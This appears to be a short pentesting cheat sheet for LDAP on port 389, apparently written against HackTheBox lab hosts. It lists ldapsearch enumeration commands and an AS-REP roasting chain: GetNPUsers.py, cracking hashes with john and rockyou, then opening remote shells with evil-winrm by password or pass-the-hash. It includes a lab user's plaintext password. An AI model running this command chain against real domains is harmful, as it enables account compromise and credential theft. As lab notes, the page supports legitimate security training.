Powered by

# Port 389 - LDAP

# LDAPSearch

LdapSearch Naming Context Dump:

ldapsearch -H 10.10.10.172 -x -s base namingcontexts

# LdapSearch Big Dump

Need Naming Context to do big dump:

ldapsearch -H {IP} -x -b "{Naming_Context}"
ldapsearch -H {IP} -x -b "DC=htb,DC=local"

# Query users in LDAP 

ldapsearch -H 10.10.10.172 -x -b "DC=MEGABANK,DC=LOCAL" '(objectClass=Person)'

# Extract hash >> Crack >> Connect 

# Get users hashes
python GetNPUsers.py MEGABANK.LOCAL/ -usersfile users.txt -dc-ip 10.10.10.172
python GetNPUsers.py -request MEGABANK.LOCAL/ -dc-ip 10.10.10.172

# Crack the hashes
john -wordlist=/usr/share/wordlists/rockyou.txt hash.txt

# Connect with Evil-winrm
evil-winrm -u mhope -p '4n0therD4y@n0th3r$' -i 10.10.10.172

# Connect using username&hash
evil-winrm -u mhope -H 'HASHDKASUDHASKUDWXADYASDASJDH' -i 10.10.10.172

# LDAP Domain Dump 

ldapdomaindump $IP -u 'fusion.corp\lparker' -p '****************' --no-json --no-grep

© Copyright 2024. Caue All rights reserved.